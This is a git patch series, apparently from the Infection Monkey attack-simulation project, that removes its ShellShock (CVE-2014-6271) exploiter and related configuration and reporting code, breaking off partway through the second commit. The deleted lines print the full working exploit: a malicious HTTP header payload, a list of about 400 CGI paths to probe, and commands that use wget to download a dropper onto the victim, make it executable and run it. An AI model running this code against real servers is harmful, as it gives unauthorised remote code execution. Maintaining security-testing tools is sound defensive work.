From 64b900b94d22e275df5cdec8ad3ec0904e44b343 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:26:25 +0100
Subject: [PATCH 1/7] Agent: Remove ShellShock exploiter

---
 monkey/infection_monkey/example.conf | 1 -
 monkey/infection_monkey/exploit/shellshock.py | 269 ------------
 .../exploit/shellshock_resources.py | 408 ------------------
 3 files changed, 678 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/shellshock.py
 delete mode 100644 monkey/infection_monkey/exploit/shellshock_resources.py

diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index a0bf5f414..efb9a4350 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -27,7 +27,6 @@
     "SSHExploiter",
     "SmbExploiter",
     "WmiExploiter",
-    "ShellShockExploiter",
     "ElasticGroovyExploiter",
     "Struts2Exploiter",
     "WebLogicExploiter",
diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py
deleted file mode 100644
index f76739e1d..000000000
--- a/monkey/infection_monkey/exploit/shellshock.py
+++ /dev/null
@@ -1,269 +0,0 @@
-# Implementation is based on shellshock script provided
-# https://github.com/nccgroup/shocker/blob/master/shocker.py
-
-import logging
-import string
-from random import SystemRandom
-
-import requests
-
-from common.utils.attack_utils import ScanStatus
-from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.shellshock_resources import CGI_FILES
-from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
-from infection_monkey.exploit.tools.http_tools import HTTPTools
-from infection_monkey.model import DROPPER_ARG
-from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
-from infection_monkey.utils.commands import build_monkey_commandline
-
-logger = logging.getLogger(__name__)
-TIMEOUT = 2
-TEST_COMMAND = "/bin/uname -a"
-DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
-LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
-
-
-class ShellShockExploiter(HostExploiter):
-    _attacks = {"Content-type": "() { :;}; echo; "}
-
-    _TARGET_OS_TYPE = ["linux"]
-    _EXPLOITED_SERVICE = "Bash"
-
-    def __init__(self, host):
-        super(ShellShockExploiter, self).__init__(host)
-        self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
-        safe_random = SystemRandom()
-        self.success_flag = "".join(
-            safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
-        )
-
-    def _exploit_host(self):
-        # start by picking ports
-        candidate_services = {
-            service: self.host.services[service]
-            for service in self.host.services
-            if ("name" in self.host.services[service])
-            and (self.host.services[service]["name"] == "http")
-        }
-
-        valid_ports = [
-            (port, candidate_services["tcp-" + str(port)]["data"][1])
-            for port in self.HTTP
-            if "tcp-" + str(port) in candidate_services
-        ]
-        http_ports = [port[0] for port in valid_ports if not port[1]]
-        https_ports = [port[0] for port in valid_ports if port[1]]
-
-        logger.info(
-            "Scanning %s, ports [%s] for vulnerable CGI pages"
-            % (self.host, ",".join([str(port[0]) for port in valid_ports]))
-        )
-
-        attackable_urls = []
-        # now for each port we want to check the entire URL list
-        for port in http_ports:
-            urls = self.check_urls(self.host.ip_addr, port)
-            attackable_urls.extend(urls)
-        for port in https_ports:
-            urls = self.check_urls(self.host.ip_addr, port, is_https=True)
-            attackable_urls.extend(urls)
-        # now for each URl we want to try and see if it's attackable
-        exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
-        exploitable_urls = [url for url in exploitable_urls if url[0] is True]
-
-        # we want to report all vulnerable URLs even if we didn't succeed
-        self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
-
-        # now try URLs until we install something on victim
-        for _, url, header, exploit in exploitable_urls:
-            logger.info("Trying to attack host %s with %s URL" % (self.host, url))
-            # same attack script as sshexec
-            # for any failure, quit and don't try other URLs
-            if not self.host.os.get("type"):
-                try:
-                    uname_os_attack = exploit + "/bin/uname -o"
-                    uname_os = self.attack_page(url, header, uname_os_attack)
-                    if "linux" in uname_os:
-                        self.host.os["type"] = "linux"
-                    else:
-                        logger.info("SSH Skipping unknown os: %s", uname_os)
-                        return False
-                except Exception as exc:
-                    logger.debug(
-                        "Error running uname os command on victim %r: (%s)", self.host, exc
-                    )
-                    return False
-            if not self.host.os.get("machine"):
-                try:
-                    uname_machine_attack = exploit + "/bin/uname -m"
-                    uname_machine = self.attack_page(url, header, uname_machine_attack)
-                    if "" != uname_machine:
-                        self.host.os["machine"] = uname_machine.lower().strip()
-                except Exception as exc:
-                    logger.debug(
-                        "Error running uname machine command on victim %r: (%s)", self.host, exc
-                    )
-                    return False
-
-            # copy the monkey
-            dropper_target_path_linux = self._config.dropper_target_path_linux
-
-            src_path = get_target_monkey(self.host)
-            if not src_path:
-                logger.info("Can't find suitable monkey executable for host %r", self.host)
-                return False
-
-            if not self._create_lock_file(exploit, url, header):
-                logger.info("Another monkey is running shellshock exploit")
-                return True
-
-            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
-
-            if not http_path:
-                logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
-                return False
-
-            download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
-
-            download = exploit + download_command
-            self.attack_page(
-                url, header, download
-            )  # we ignore failures here since it might take more than TIMEOUT time
-
-            http_thread.join(DOWNLOAD_TIMEOUT)
-            http_thread.stop()
-
-            self._remove_lock_file(exploit, url, header)
-
-            if (http_thread.downloads != 1) or (
-                "ELF"
-                not in self.check_remote_file_exists(
-                    url, header, exploit, dropper_target_path_linux
-                )
-            ):
-                logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
-                continue
-
-            # turn the monkey into an executable
-            chmod = "/bin/chmod +x %s" % dropper_target_path_linux
-            run_path = exploit + chmod
-            self.attack_page(url, header, run_path)
-            T1222Telem(ScanStatus.USED, chmod, self.host).send()
-
-            # run the monkey
-            cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
-            cmdline += build_monkey_commandline(
-                self.host,
-                get_monkey_depth() - 1,
-                dropper_target_path_linux,
-            )
-            cmdline += " & "
-            run_path = exploit + cmdline
-            self.attack_page(url, header, run_path)
-
-            logger.info(
-                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                self._config.dropper_target_path_linux,
-                self.host,
-                cmdline,
-            )
-
-            if not (
-                self.check_remote_file_exists(
-                    url, header, exploit, self._config.monkey_log_path_linux
-                )
-            ):
-                logger.info("Log file does not exist, monkey might not have run")
-                continue
-            self.add_executed_cmd(cmdline)
-            return True
-
-        return False
-
-    @classmethod
-    def check_remote_file_exists(cls, url, header, exploit, file_path):
-        """
-        Checks if a remote file exists and returns the content if so
-        file_path should be fully qualified
-        """
-        cmdline = "/usr/bin/head -c 4 %s" % file_path
-        run_path = exploit + cmdline
-        resp = cls.attack_page(url, header, run_path)
-        if resp:
-            logger.info("File %s exists on remote host" % file_path)
-        return resp
-
-    def attempt_exploit(self, url, attacks=None):
-        # Flag used to identify whether the exploit has successfully caused the
-        # server to return a useful response
-
-        if not attacks:
-            attacks = self._attacks
-
-        logger.debug("Attack Flag is: %s" % self.success_flag)
-
-        logger.debug("Trying exploit for %s" % url)
-        for header, exploit in list(attacks.items()):
-            attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
-            result = self.attack_page(url, header, attack)
-            if self.success_flag in result:
-                logger.info("URL %s looks vulnerable" % url)
-                return True, url, header, exploit
-            else:
-                logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
-        return (False,)
-
-    def _create_lock_file(self, exploit, url, header):
-        if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
-            return False
-        cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
-        self.attack_page(url, header, cmd)
-        return True
-
-    def _remove_lock_file(self, exploit, url, header):
-        cmd = exploit + "rm %s" % LOCK_HELPER_FILE
-        self.attack_page(url, header, cmd)
-
-    @staticmethod
-    def attack_page(url, header, attack):
-        result = ""
-        try:
-            logger.debug("Header is: %s" % header)
-            logger.debug("Attack is: %s" % attack)
-            r = requests.get(  # noqa: DUO123
-                url, headers={header: attack}, verify=False, timeout=TIMEOUT
-            )
-            result = r.content.decode()
-            return result
-        except requests.exceptions.RequestException as exc:
-            logger.debug("Failed to run, exception %s" % exc)
-        return result
-
-    @staticmethod
-    def check_urls(host, port, is_https=False, url_list=CGI_FILES):
-        """
-        Checks if which urls exist
-        :return: Sequence of URLs to try and attack
-        """
-        attack_path = "http://"
-        if is_https:
-            attack_path = "https://"
-        attack_path = attack_path + str(host) + ":" + str(port)
-        reqs = []
-        timeout = False
-        attack_urls = [attack_path + url for url in url_list]
-        for u in attack_urls:
-            try:
-                reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))  # noqa: DUO123
-            except requests.Timeout:
-                timeout = True
-                break
-        if timeout:
-            logger.debug(
-                "Some connections timed out while sending request to potentially vulnerable "
-                "urls."
-            )
-        valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
-        urls = [resp.url for resp in valid_resps]
-
-        return urls
diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py
deleted file mode 100644
index 3a128b23e..000000000
--- a/monkey/infection_monkey/exploit/shellshock_resources.py
+++ /dev/null
@@ -1,408 +0,0 @@
-# resource for shellshock attack
-# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
-
-CGI_FILES = (
-    r"/",
-    r"/admin.cgi",
-    r"/administrator.cgi",
-    r"/agora.cgi",
-    r"/aktivate/cgi-bin/catgy.cgi",
-    r"/analyse.cgi",
-    r"/apps/web/vs_diag.cgi",
-    r"/axis-cgi/buffer/command.cgi",
-    r"/b2-include/b2edit.showposts.php",
-    r"/bandwidth/index.cgi",
-    r"/bigconf.cgi",
-    r"/cartcart.cgi",
-    r"/cart.cgi",
-    r"/ccbill/whereami.cgi",
-    r"/cgi-bin/14all-1.1.cgi",
-    r"/cgi-bin/14all.cgi",
-    r"/cgi-bin/a1disp3.cgi",
-    r"/cgi-bin/a1stats/a1disp3.cgi",
-    r"/cgi-bin/a1stats/a1disp4.cgi",
-    r"/cgi-bin/addbanner.cgi",
-    r"/cgi-bin/add_ftp.cgi",
-    r"/cgi-bin/adduser.cgi",
-    r"/cgi-bin/admin/admin.cgi",
-    r"/cgi-bin/admin.cgi",
-    r"/cgi-bin/admin/getparam.cgi",
-    r"/cgi-bin/adminhot.cgi",
-    r"/cgi-bin/admin.pl",
-    r"/cgi-bin/admin/setup.cgi",
-    r"/cgi-bin/adminwww.cgi",
-    r"/cgi-bin/af.cgi",
-    r"/cgi-bin/aglimpse.cgi",
-    r"/cgi-bin/alienform.cgi",
-    r"/cgi-bin/AnyBoard.cgi",
-    r"/cgi-bin/architext_query.cgi",
-    r"/cgi-bin/astrocam.cgi",
-    r"/cgi-bin/AT-admin.cgi",
-    r"/cgi-bin/AT-generate.cgi",
-    r"/cgi-bin/auction/auction.cgi",
-    r"/cgi-bin/auktion.cgi",
-    r"/cgi-bin/ax-admin.cgi",
-    r"/cgi-bin/ax.cgi",
-    r"/cgi-bin/axs.cgi",
-    r"/cgi-bin/badmin.cgi",
-    r"/cgi-bin/banner.cgi",
-    r"/cgi-bin/bannereditor.cgi",
-    r"/cgi-bin/bb-ack.sh",
-    r"/cgi-bin/bb-histlog.sh",
-    r"/cgi-bin/bb-hist.sh",
-    r"/cgi-bin/bb-hostsvc.sh",
-    r"/cgi-bin/bb-replog.sh",
-    r"/cgi-bin/bb-rep.sh",
-    r"/cgi-bin/bbs_forum.cgi",
-    r"/cgi-bin/bigconf.cgi",
-    r"/cgi-bin/bizdb1-search.cgi",
-    r"/cgi-bin/blog/mt-check.cgi",
-    r"/cgi-bin/blog/mt-load.cgi",
-    r"/cgi-bin/bnbform.cgi",
-    r"/cgi-bin/book.cgi",
-    r"/cgi-bin/boozt/admin/index.cgi",
-    r"/cgi-bin/bsguest.cgi",
-    r"/cgi-bin/bslist.cgi",
-    r"/cgi-bin/build.cgi",
-    r"/cgi-bin/bulk/bulk.cgi",
-    r"/cgi-bin/cached_feed.cgi",
-    r"/cgi-bin/cachemgr.cgi",
-    r"/cgi-bin/calendar/index.cgi",
-    r"/cgi-bin/cartmanager.cgi",
-    r"/cgi-bin/cbmc/forums.cgi",
-    r"/cgi-bin/ccvsblame.cgi",
-    r"/cgi-bin/c_download.cgi",
-    r"/cgi-bin/cgforum.cgi",
-    r"/cgi-bin/.cgi",
-    r"/cgi-bin/cgi_process",
-    r"/cgi-bin/classified.cgi",
-    r"/cgi-bin/classifieds.cgi",
-    r"/cgi-bin/classifieds/classifieds.cgi",
-    r"/cgi-bin/classifieds/index.cgi",
-    r"/cgi-bin/.cobalt/alert/service.cgi",
-    r"/cgi-bin/.cobalt/message/message.cgi",
-    r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
-    r"/cgi-bin/commandit.cgi",
-    r"/cgi-bin/commerce.cgi",
-    r"/cgi-bin/common/listrec.pl",
-    r"/cgi-bin/compatible.cgi",
-    r"/cgi-bin/Count.cgi",
-    r"/cgi-bin/csChatRBox.cgi",
-    r"/cgi-bin/csGuestBook.cgi",
-    r"/cgi-bin/csLiveSupport.cgi",
-    r"/cgi-bin/CSMailto.cgi",
-    r"/cgi-bin/CSMailto/CSMailto.cgi",
-    r"/cgi-bin/csNews.cgi",
-    r"/cgi-bin/csNewsPro.cgi",
-    r"/cgi-bin/csPassword.cgi",
-    r"/cgi-bin/csPassword/csPassword.cgi",
-    r"/cgi-bin/csSearch.cgi",
-    r"/cgi-bin/csv_db.cgi",
-    r"/cgi-bin/cvsblame.cgi",
-    r"/cgi-bin/cvslog.cgi",
-    r"/cgi-bin/cvsquery.cgi",
-    r"/cgi-bin/cvsqueryform.cgi",
-    r"/cgi-bin/day5datacopier.cgi",
-    r"/cgi-bin/day5datanotifier.cgi",
-    r"/cgi-bin/db_manager.cgi",
-    r"/cgi-bin/dbman/db.cgi",
-    r"/cgi-bin/dcforum.cgi",
-    r"/cgi-bin/dcshop.cgi",
-    r"/cgi-bin/dfire.cgi",
-    r"/cgi-bin/diagnose.cgi",
-    r"/cgi-bin/dig.cgi",
-    r"/cgi-bin/directorypro.cgi",
-    r"/cgi-bin/download.cgi",
-    r"/cgi-bin/e87_Ba79yo87.cgi",
-    r"/cgi-bin/emu/html/emumail.cgi",
-    r"/cgi-bin/emumail.cgi",
-    r"/cgi-bin/emumail/emumail.cgi",
-    r"/cgi-bin/enter.cgi",
-    r"/cgi-bin/environ.cgi",
-    r"/cgi-bin/ezadmin.cgi",
-    r"/cgi-bin/ezboard.cgi",
-    r"/cgi-bin/ezman.cgi",
-    r"/cgi-bin/ezshopper2/loadpage.cgi",
-    r"/cgi-bin/ezshopper3/loadpage.cgi",
-    r"/cgi-bin/ezshopper/loadpage.cgi",
-    r"/cgi-bin/ezshopper/search.cgi",
-    r"/cgi-bin/faqmanager.cgi",
-    r"/cgi-bin/FileSeek2.cgi",
-    r"/cgi-bin/FileSeek.cgi",
-    r"/cgi-bin/finger.cgi",
-    r"/cgi-bin/flexform.cgi",
-    r"/cgi-bin/fom.cgi",
-    r"/cgi-bin/fom/fom.cgi",
-    r"/cgi-bin/FormHandler.cgi",
-    r"/cgi-bin/FormMail.cgi",
-    r"/cgi-bin/gbadmin.cgi",
-    r"/cgi-bin/gbook/gbook.cgi",
-    r"/cgi-bin/generate.cgi",
-    r"/cgi-bin/getdoc.cgi",
-    r"/cgi-bin/gH.cgi",
-    r"/cgi-bin/gm-authors.cgi",
-    r"/cgi-bin/gm.cgi",
-    r"/cgi-bin/gm-cplog.cgi",
-    r"/cgi-bin/guestbook.cgi",
-    r"/cgi-bin/handler",
-    r"/cgi-bin/handler.cgi",
-    r"/cgi-bin/handler/netsonar",
-    r"/cgi-bin/hitview.cgi",
-    r"/cgi-bin/hsx.cgi",
-    r"/cgi-bin/html2chtml.cgi",
-    r"/cgi-bin/html2wml.cgi",
-    r"/cgi-bin/htsearch.cgi",
-    r"/cgi-bin/hw.sh",  # testing
-    r"/cgi-bin/icat",
-    r"/cgi-bin/if/admin/nph-build.cgi",
-    r"/cgi-bin/ikonboard/help.cgi",
-    r"/cgi-bin/ImageFolio/admin/admin.cgi",
-    r"/cgi-bin/imageFolio.cgi",
-    r"/cgi-bin/index.cgi",
-    r"/cgi-bin/infosrch.cgi",
-    r"/cgi-bin/jammail.pl",
-    r"/cgi-bin/journal.cgi",
-    r"/cgi-bin/lastlines.cgi",
-    r"/cgi-bin/loadpage.cgi",
-    r"/cgi-bin/login.cgi",
-    r"/cgi-bin/logit.cgi",
-    r"/cgi-bin/log-reader.cgi",
-    r"/cgi-bin/lookwho.cgi",
-    r"/cgi-bin/lwgate.cgi",
-    r"/cgi-bin/MachineInfo",
-    r"/cgi-bin/MachineInfo",
-    r"/cgi-bin/magiccard.cgi",
-    r"/cgi-bin/mail/emumail.cgi",
-    r"/cgi-bin/maillist.cgi",
-    r"/cgi-bin/mailnews.cgi",
-    r"/cgi-bin/mail/nph-mr.cgi",
-    r"/cgi-bin/main.cgi",
-    r"/cgi-bin/main_menu.pl",
-    r"/cgi-bin/man.sh",
-    r"/cgi-bin/mini_logger.cgi",
-    r"/cgi-bin/mmstdod.cgi",
-    r"/cgi-bin/moin.cgi",
-    r"/cgi-bin/mojo/mojo.cgi",
-    r"/cgi-bin/mrtg.cgi",
-    r"/cgi-bin/mt.cgi",
-    r"/cgi-bin/mt/mt.cgi",
-    r"/cgi-bin/mt/mt-check.cgi",
-    r"/cgi-bin/mt/mt-load.cgi",
-    r"/cgi-bin/mt-static/mt-check.cgi",
-    r"/cgi-bin/mt-static/mt-load.cgi",
-    r"/cgi-bin/musicqueue.cgi",
-    r"/cgi-bin/myguestbook.cgi",
-    r"/cgi-bin/.namazu.cgi",
-    r"/cgi-bin/nbmember.cgi",
-    r"/cgi-bin/netauth.cgi",
-    r"/cgi-bin/netpad.cgi",
-    r"/cgi-bin/newsdesk.cgi",
-    r"/cgi-bin/nlog-smb.cgi",
-    r"/cgi-bin/nph-emumail.cgi",
-    r"/cgi-bin/nph-exploitscanget.cgi",
-    r"/cgi-bin/nph-publish.cgi",
-    r"/cgi-bin/nph-test.cgi",
-    r"/cgi-bin/pagelog.cgi",
-    r"/cgi-bin/pbcgi.cgi",
-    r"/cgi-bin/perlshop.cgi",
-    r"/cgi-bin/pfdispaly.cgi",
-    r"/cgi-bin/pfdisplay.cgi",
-    r"/cgi-bin/phf.cgi",
-    r"/cgi-bin/photo/manage.cgi",
-    r"/cgi-bin/photo/protected/manage.cgi",
-    r"/cgi-bin/php-cgi",
-    r"/cgi-bin/php.cgi",
-    r"/cgi-bin/php.fcgi",
-    r"/cgi-bin/ping.sh",
-    r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
-    r"/cgi-bin/pollssi.cgi",
-    r"/cgi-bin/postcards.cgi",
-    r"/cgi-bin/powerup/r.cgi",
-    r"/cgi-bin/printenv",
-    r"/cgi-bin/probecontrol.cgi",
-    r"/cgi-bin/profile.cgi",
-    r"/cgi-bin/publisher/search.cgi",
-    r"/cgi-bin/quickstore.cgi",
-    r"/cgi-bin/quizme.cgi",
-    r"/cgi-bin/ratlog.cgi",
-    r"/cgi-bin/r.cgi",
-    r"/cgi-bin/register.cgi",
-    r"/cgi-bin/replicator/webpage.cgi/",
-    r"/cgi-bin/responder.cgi",
-    r"/cgi-bin/robadmin.cgi",
-    r"/cgi-bin/robpoll.cgi",
-    r"/cgi-bin/rtpd.cgi",
-    r"/cgi-bin/sbcgi/sitebuilder.cgi",
-    r"/cgi-bin/scoadminreg.cgi",
-    r"/cgi-bin-sdb/printenv",
-    r"/cgi-bin/sdbsearch.cgi",
-    r"/cgi-bin/search",
-    r"/cgi-bin/search.cgi",
-    r"/cgi-bin/search/search.cgi",
-    r"/cgi-bin/sendform.cgi",
-    r"/cgi-bin/shop.cgi",
-    r"/cgi-bin/shopper.cgi",
-    r"/cgi-bin/shopplus.cgi",
-    r"/cgi-bin/showcheckins.cgi",
-    r"/cgi-bin/simplestguest.cgi",
-    r"/cgi-bin/simplestmail.cgi",
-    r"/cgi-bin/smartsearch.cgi",
-    r"/cgi-bin/smartsearch/smartsearch.cgi",
-    r"/cgi-bin/snorkerz.bat",
-    r"/cgi-bin/snorkerz.bat",
-    r"/cgi-bin/snorkerz.cmd",
-    r"/cgi-bin/snorkerz.cmd",
-    r"/cgi-bin/sojourn.cgi",
-    r"/cgi-bin/spin_client.cgi",
-    r"/cgi-bin/start.cgi",
-    r"/cgi-bin/status",
-    r"/cgi-bin/status_cgi",
-    r"/cgi-bin/store/agora.cgi",
-    r"/cgi-bin/store.cgi",
-    r"/cgi-bin/store/index.cgi",
-    r"/cgi-bin/survey.cgi",
-    r"/cgi-bin/sync.cgi",
-    r"/cgi-bin/talkback.cgi",
-    r"/cgi-bin/technote/main.cgi",
-    r"/cgi-bin/test2.pl",
-    r"/cgi-bin/test-cgi",
-    r"/cgi-bin/test.cgi",
-    r"/cgi-bin/testing_whatever",
-    r"/cgi-bin/test/test.cgi",
-    r"/cgi-bin/tidfinder.cgi",
-    r"/cgi-bin/tigvote.cgi",
-    r"/cgi-bin/title.cgi",
-    r"/cgi-bin/top.cgi",
-    r"/cgi-bin/traffic.cgi",
-    r"/cgi-bin/troops.cgi",
-    r"/cgi-bin/ttawebtop.cgi/",
-    r"/cgi-bin/ultraboard.cgi",
-    r"/cgi-bin/upload.cgi",
-    r"/cgi-bin/urlcount.cgi",
-    r"/cgi-bin/viewcvs.cgi",
-    r"/cgi-bin/view_help.cgi",
-    r"/cgi-bin/viralator.cgi",
-    r"/cgi-bin/virgil.cgi",
-    r"/cgi-bin/vote.cgi",
-    r"/cgi-bin/vpasswd.cgi",
-    r"/cgi-bin/way-board.cgi",
-    r"/cgi-bin/way-board/way-board.cgi",
-    r"/cgi-bin/webbbs.cgi",
-    r"/cgi-bin/webcart/webcart.cgi",
-    r"/cgi-bin/webdist.cgi",
-    r"/cgi-bin/webif.cgi",
-    r"/cgi-bin/webmail/html/emumail.cgi",
-    r"/cgi-bin/webmap.cgi",
-    r"/cgi-bin/webspirs.cgi",
-    r"/cgi-bin/Web_Store/web_store.cgi",
-    r"/cgi-bin/whois.cgi",
-    r"/cgi-bin/whois_raw.cgi",
-    r"/cgi-bin/whois/whois.cgi",
-    r"/cgi-bin/wrap",
-    r"/cgi-bin/wrap.cgi",
-    r"/cgi-bin/wwwboard.cgi.cgi",
-    r"/cgi-bin/YaBB/YaBB.cgi",
-    r"/cgi-bin/zml.cgi",
-    r"/cgi-mod/index.cgi",
-    r"/cgis/wwwboard/wwwboard.cgi",
-    r"/cgi-sys/addalink.cgi",
-    r"/cgi-sys/defaultwebpage.cgi",
-    r"/cgi-sys/domainredirect.cgi",
-    r"/cgi-sys/entropybanner.cgi",
-    r"/cgi-sys/entropysearch.cgi",
-    r"/cgi-sys/FormMail-clone.cgi",
-    r"/cgi-sys/helpdesk.cgi",
-    r"/cgi-sys/mchat.cgi",
-    r"/cgi-sys/randhtml.cgi",
-    r"/cgi-sys/realhelpdesk.cgi",
-    r"/cgi-sys/realsignup.cgi",
-    r"/cgi-sys/signup.cgi",
-    r"/connector.cgi",
-    r"/cp/rac/nsManager.cgi",
-    r"/create_release.sh",
-    r"/CSNews.cgi",
-    r"/csPassword.cgi",
-    r"/dcadmin.cgi",
-    r"/dcboard.cgi",
-    r"/dcforum.cgi",
-    r"/dcforum/dcforum.cgi",
-    r"/debuff.cgi",
-    r"/debug.cgi",
-    r"/details.cgi",
-    r"/edittag/edittag.cgi",
-    r"/emumail.cgi",
-    r"/enter_buff.cgi",
-    r"/enter_bug.cgi",
-    r"/ez2000/ezadmin.cgi",
-    r"/ez2000/ezboard.cgi",
-    r"/ez2000/ezman.cgi",
-    r"/fcgi-bin/echo",
-    r"/fcgi-bin/echo",
-    r"/fcgi-bin/echo2",
-    r"/fcgi-bin/echo2",
-    r"/Gozila.cgi",
-    r"/hitmatic/analyse.cgi",
-    r"/hp_docs/cgi-bin/index.cgi",
-    r"/html/cgi-bin/cgicso",
-    r"/html/cgi-bin/cgicso",
-    r"/index.cgi",
-    r"/info.cgi",
-    r"/infosrch.cgi",
-    r"/login.cgi",
-    r"/mailview.cgi",
-    r"/main.cgi",
-    r"/megabook/admin.cgi",
-    r"/ministats/admin.cgi",
-    r"/mods/apage/apage.cgi",
-    r"/_mt/mt.cgi",
-    r"/musicqueue.cgi",
-    r"/ncbook.cgi",
-    r"/newpro.cgi",
-    r"/newsletter.sh",
-    r"/oem_webstage/cgi-bin/oemapp_cgi",
-    r"/page.cgi",
-    r"/parse_xml.cgi",
-    r"/photodata/manage.cgi",
-    r"/photo/manage.cgi",
-    r"/print.cgi",
-    r"/process_buff.cgi",
-    r"/process_bug.cgi",
-    r"/pub/english.cgi",
-    r"/quikmail/nph-emumail.cgi",
-    r"/quikstore.cgi",
-    r"/reviews/newpro.cgi",
-    r"/ROADS/cgi-bin/search.pl",
-    r"/sample01.cgi",
-    r"/sample02.cgi",
-    r"/sample03.cgi",
-    r"/sample04.cgi",
-    r"/sampleposteddata.cgi",
-    r"/scancfg.cgi",
-    r"/scancfg.cgi",
-    r"/servers/link.cgi",
-    r"/setpasswd.cgi",
-    r"/SetSecurity.shm",
-    r"/shop/member_html.cgi",
-    r"/shop/normal_html.cgi",
-    r"/site_searcher.cgi",
-    r"/siteUserMod.cgi",
-    r"/submit.cgi",
-    r"/technote/print.cgi",
-    r"/template.cgi",
-    r"/test.cgi",
-    r"/ucsm/isSamInstalled.cgi",
-    r"/upload.cgi",
-    r"/userreg.cgi",
-    r"/users/scripts/submit.cgi",
-    r"/vood/cgi-bin/vood_view.cgi",
-    r"/Web_Store/web_store.cgi",
-    r"/webtools/bonsai/ccvsblame.cgi",
-    r"/webtools/bonsai/cvsblame.cgi",
-    r"/webtools/bonsai/cvslog.cgi",
-    r"/webtools/bonsai/cvsquery.cgi",
-    r"/webtools/bonsai/cvsqueryform.cgi",
-    r"/webtools/bonsai/showcheckins.cgi",
-    r"/wwwadmin.cgi",
-    r"/wwwboard.cgi",
-    r"/wwwboard/wwwboard.cgi",
-)
From 60d16ea4d66b067db0b6b8cb67be67bbf0ed4dab Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:27:59 +0100
Subject: [PATCH 2/7] Island: Remove ShellShock Exploiter

---
 .../cc/services/config_schema/basic.py | 1 -
 .../definitions/exploiter_classes.py | 10 -------
 .../cc/services/reporting/aws_exporter.py | 18 -----------
 .../exploiter_descriptor_enum.py | 6 ----
 .../processors/shellshock_exploit.py | 15 ----------
 .../report-components/SecurityReport.js | 6 ----
 .../security/issues/ShellShockIssue.js | 30 -------------------
 7 files changed, 86 deletions(-)
 delete mode 100644 monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
 delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js

diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py
index 9151ff259..0f841e968 100644
--- a/monkey/monkey_island/cc/services/config_schema/basic.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic.py
@@ -18,7 +18,6 @@ BASIC = {
                     "WmiExploiter",
                     "SSHExploiter",
                     "Log4ShellExploiter",
-                    "ShellShockExploiter",
                     "ElasticGroovyExploiter",
                     "Struts2Exploiter",
                     "WebLogicExploiter",
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
index f21bc942d..e9a5ac5ea 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@@ -53,16 +53,6 @@ EXPLOITER_CLASSES = {
                 "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
                 "/exploiters/sshexec/",
             },
-            {
-                "type": "string",
-                "enum": ["ShellShockExploiter"],
-                "title": "ShellShock Exploiter",
-                "safe": True,
-                "info": "CVE-2014-6271, based on logic from "
-                "https://github.com/nccgroup/shocker/blob/master/shocker.py .",
-                "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
-                "/shellshock/",
-            },
             {
                 "type": "string",
                 "enum": ["ElasticGroovyExploiter"],
diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
index 927685560..00d738b07 100644
--- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py
+++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
@@ -68,7 +68,6 @@ class AWSExporter(Exporter):
                 CredentialType.PASSWORD.value: AWSExporter._handle_ssh_issue,
                 CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
             },
-            ExploiterDescriptorEnum.SHELLSHOCK.value.class_name: AWSExporter._handle_shellshock_issue,  # noqa:E501
             "tunnel": AWSExporter._handle_tunnel_issue,
             ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
             ExploiterDescriptorEnum.SMB.value.class_name: {
